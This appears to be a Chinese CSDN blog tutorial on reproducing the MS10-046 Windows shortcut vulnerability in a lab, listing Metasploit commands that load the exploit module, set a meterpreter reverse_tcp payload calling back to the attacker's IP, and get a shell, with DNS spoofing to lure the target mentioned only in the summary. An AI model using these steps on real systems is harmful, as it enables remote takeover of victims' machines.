MS10-046漏洞复现配合DNS欺骗

本文详细介绍了如何复现MS10-046漏洞,通过生成攻击URL并利用Metasploit设置payload和参数,成功在靶机上getshell。同时,文章探讨了DNS挟持技术,展示了如何在特定目录下添加欺骗域名,并启动DNS欺骗。在靶机清理DNS缓存后,访问被欺骗域名时,将重新导向攻击机,再次实现远程控制。
摘要由CSDN通过智能技术生成
  • 利用ms10_046漏洞生成攻击URL:

    使用漏洞攻击模块

    use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
    

    设置payload

    set payload windows/meterpreter/reverse_tcp
    

    设置攻击参数

    set SRVHOST 攻击机IP
    set LHOST	攻击机IP
    

    运行

    run
    

    使用msf

  • 在靶机上访问之前生成的URL

    在这里插入图片描述

    同时在攻击机上查看建立的会话 sessions

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值